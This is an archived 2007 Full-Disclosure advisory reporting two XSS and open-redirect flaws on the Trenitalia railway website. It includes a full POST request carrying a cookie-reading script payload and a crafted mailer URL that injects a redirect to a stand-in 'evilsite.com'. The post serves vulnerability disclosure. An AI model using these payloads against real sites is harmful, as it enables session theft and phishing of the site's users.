| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 23 Jul 2007 03:45:39 -0400 From: "davide@...urityinfos.com" <davide@...urityinfos.com> To: full-disclosure@...ts.grok.org.uk Subject: Multiple vulnerabilities in Trenitalia.com website [-] Overview Trenitalia.com is the website of the most important railway company in Italy. In this website, I've been discovered two vulnerabilities that allow attacker to execute arbitrary javascript code via XSS or URL redirect. [-] Vulnerability Description In the first vulnerability, it's necessary to sending POST request, adding in POSTDATA textfield variable arbitrary HTML commands as following: POST http://www.ferroviedellostato.it/ferrovie/v/index.jsp?vgnextoid=c813055409b8 c010VgnVCM1001002f2af90aRCRD Host=www.ferroviedellostato.it User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Accept= */* Accept-Language= it Accept-Encoding=gzip,deflate Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive=300 Connection=keep-alive Referer=http://www.ferroviedellostato.it/ Cookie=JSESSIONID=0000K_6eq2u2Z8MaLviVwAgmxu1:123p65u0i Content-Type=application/x-www-form-urlencoded Content-Length=63 POSTDATA=textfield=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E ------ - - - - - - - - - In the second one, the ffss_mailer.jsp page generates a mail form to send an invite to friend, but it allows user to add in textfield variable arbitraty HTML code, creating a malicious mail that contains URL redirect or XSS attack: this is an example ( evilsite.com must be replaced with the site to redirect ) http://www.ferroviedellostato.it/ferrovie/mails/ffss_mailer.jsp?vgnextoid=c8 13055209b8c010VgnVCM1000002f2af90aRCRD&textfield=</span></p>%3Cscript%3Eloca tion.href='http://evilsite.com'%3C/script%3E',%20\'width=516,height=255,stat us=yes',%20'width=516,height=255,status=yes [-] Additional Information Vulnerability screenshots are available at these URLs: http://exploit.blogosfere.it/images/trenitaliamail.jpg/screenMail.jpg http://exploit.blogosfere.it/images/trenitaliaMainPage.jpg/trenitaliaPage.jp g [-] Company Notification Trenitalia.com has been notified [-] Credits The vulnerability was discovered by Davide Denicolo Davide Denicolo davide <~@~> securityinfos < . > com http://exploit.blogosfere.it -------------------------------------------------------------------- mail2web LIVE – Free email based on Microsoft® Exchange technology - http://link.mail2web.com/LIVE _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists